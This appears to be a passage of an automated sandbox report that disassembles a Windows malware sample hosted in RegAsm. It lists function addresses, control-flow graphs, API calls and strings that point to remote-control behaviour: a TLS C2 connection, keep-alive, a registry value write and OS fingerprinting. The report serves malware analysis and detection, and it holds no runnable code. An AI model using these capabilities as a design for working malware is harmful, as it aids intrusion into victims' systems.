                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                • API String ID: 2490988753-744132762
                                                                                • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                                Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1314 4048c8-4048e8 connect 1315 404a1b-404a1f 1314->1315 1316 4048ee-4048f1 1314->1316 1319 404a21-404a2f WSAGetLastError 1315->1319 1320 404a97 1315->1320 1317 404a17-404a19 1316->1317 1318 4048f7-4048fa 1316->1318 1321 404a99-404a9e 1317->1321 1322 404926-404930 call 420cf1 1318->1322 1323 4048fc-404923 call 40531e call 402093 call 41b580 1318->1323 1319->1320 1324 404a31-404a34 1319->1324 1320->1321 1336 404941-40494e call 420f20 1322->1336 1337 404932-40493c 1322->1337 1323->1322 1326 404a71-404a76 1324->1326 1327 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1324->1327 1329 404a7b-404a94 call 402093 * 2 call 41b580 1326->1329 1327->1320 1329->1320 1349 404950-404973 call 402093 * 2 call 41b580 1336->1349 1350 404987-404992 call 421ad1 1336->1350 1337->1329 1376 404976-404982 call 420d31 1349->1376 1361 4049c4-4049d1 call 420e97 1350->1361 1362 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1350->1362 1372 4049d3-4049f6 call 402093 * 2 call 41b580 1361->1372 1373 4049f9-404a14 CreateEventW * 2 1361->1373 1362->1376 1372->1373 1373->1317 1376->1320
                                                                                APIs
                                                                                • connect.WS2_32(FFFFFFFF,00C24830,00000010), ref: 004048E0
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                • API String ID: 994465650-2151626615
                                                                                • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                                                Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                • String ID:
                                                                                • API String ID: 3658366068-0
                                                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                                                Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1406 40da6f-40da94 call 401f86 1409 40da9a 1406->1409 1410 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1406->1410 1411 40dae0-40dae7 call 41c048 1409->1411 1412 40daa1-40daa6 1409->1412 1413 40db93-40db98 1409->1413 1414 40dad6-40dadb 1409->1414 1415 40dba9 1409->1415 1416 40db9a-40db9f call 43c11f 1409->1416 1417 40daab-40dab9 call 41b645 call 401f13 1409->1417 1418 40dacc-40dad1 1409->1418 1419 40db8c-40db91 1409->1419 1431 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1411->1431 1432 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1411->1432 1421 40dbae-40dbb3 call 43c11f 1412->1421 1413->1421 1414->1421 1415->1421 1426 40dba4-40dba7 1416->1426 1439 40dabe 1417->1439 1418->1421 1419->1421 1433 40dbb4-40dbb9 call 409092 1421->1433 1426->1415 1426->1433 1444 40dac2-40dac7 call 401f09 1431->1444 1432->1439 1433->1410 1439->1444 1444->1410
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                • API String ID: 82841172-425784914
                                                                                • Opcode ID: dcd1128b7a106c79bca106c67d8098b9e866a23ab1c383420f4c9685f235a15f
                                                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                • Opcode Fuzzy Hash: dcd1128b7a106c79bca106c67d8098b9e866a23ab1c383420f4c9685f235a15f
                                                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                                                Function 0041B354 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1488 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1499 41b3ad-41b3d8 call 4135e1 call 401fab StrToIntA 1488->1499 1500 41b3ee-41b3f7 1488->1500 1510 41b3e6-41b3e9 call 401fd8 1499->1510 1511 41b3da-41b3e3 call 41cffa 1499->1511 1502 41b400 1500->1502 1503 41b3f9-41b3fe 1500->1503 1505 41b405-41b410 call 40537d 1502->1505 1503->1505 1510->1500 1511->1510
                                                                                APIs
                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$p54
                                                                                • API String ID: 782494840-3726100942
                                                                                • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1515 44acc9-44ace2 1516 44ace4-44acf4 call 4467e6 1515->1516 1517 44acf8-44acfd 1515->1517 1516->1517 1524 44acf6 1516->1524 1518 44acff-44ad07 1517->1518 1519 44ad0a-44ad2e MultiByteToWideChar 1517->1519 1518->1519 1522 44ad34-44ad40 1519->1522 1523 44aec1-44aed4 call 43502b 1519->1523 1525 44ad94 1522->1525 1526 44ad42-44ad53 1522->1526 1524->1517 1528 44ad96-44ad98 1525->1528 1529 44ad55-44ad64 call 457210 1526->1529 1530 44ad72-44ad83 call 4461b8 1526->1530 1532 44aeb6 1528->1532 1533 44ad9e-44adb1 MultiByteToWideChar 1528->1533 1529->1532 1542 44ad6a-44ad70 1529->1542 1530->1532 1543 44ad89 1530->1543 1537 44aeb8-44aebf call 435ecd 1532->1537 1533->1532 1536 44adb7-44adc9 call 448c33 1533->1536 1544 44adce-44add2 1536->1544 1537->1523 1546 44ad8f-44ad92 1542->1546 1543->1546 1544->1532 1547 44add8-44addf 1544->1547 1546->1528 1548 44ade1-44ade6 1547->1548 1549 44ae19-44ae25 1547->1549 1548->1537 1550 44adec-44adee 1548->1550 1551 44ae27-44ae38 1549->1551 1552 44ae71 1549->1552 1550->1532 1553 44adf4-44ae0e call 448c33 1550->1553 1555 44ae53-44ae64 call 4461b8 1551->1555 1556 44ae3a-44ae49 call 457210 1551->1556 1554 44ae73-44ae75 1552->1554 1553->1537 1570 44ae14 1553->1570 1560 44ae77-44ae90 call 448c33 1554->1560 1561 44aeaf-44aeb5 call 435ecd 1554->1561 1555->1561 1569 44ae66 1555->1569 1556->1561 1567 44ae4b-44ae51 1556->1567 1560->1561 1573 44ae92-44ae99 1560->1573 1561->1532 1572 44ae6c-44ae6f 1567->1572 1569->1572 1570->1532 1572->1554 1574 44aed5-44aedb 1573->1574 1575 44ae9b-44ae9c 1573->1575 1576 44ae9d-44aead WideCharToMultiByte 1574->1576 1575->1576 1576->1561 1577 44aedd-44aee4 call 435ecd 1576->1577 1577->1537
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                • __freea.LIBCMT ref: 0044AEB0
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                • __freea.LIBCMT ref: 0044AEB9
                                                                                • __freea.LIBCMT ref: 0044AEDE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 3864826663-0
                                                                                • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                • __freea.LIBCMT ref: 10008A08
                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                • __freea.LIBCMT ref: 10008A11
                                                                                • __freea.LIBCMT ref: 10008A36
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountEventTick
                                                                                • String ID: !D@$NG
                                                                                • API String ID: 180926312-2721294649
                                                                                • Opcode ID: b7c960f52b31dbd90d58f0542966593201612a8263a01e59912c3b467a2dc670
                                                                                • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                • Opcode Fuzzy Hash: b7c960f52b31dbd90d58f0542966593201612a8263a01e59912c3b467a2dc670
                                                                                • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$EventLocalThreadTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 2532271599-1507639952
                                                                                • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                                                • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                                                • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 1818849710-4028850238
                                                                                • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3360349984-0
                                                                                • Opcode ID: a7859c0859ff1460fb498f226e87523366a5d7389d1c528f14f49a7270558968
                                                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                • Opcode Fuzzy Hash: a7859c0859ff1460fb498f226e87523366a5d7389d1c528f14f49a7270558968
                                                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                Function 1000C7E6 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModuleProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2905821283-0
                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
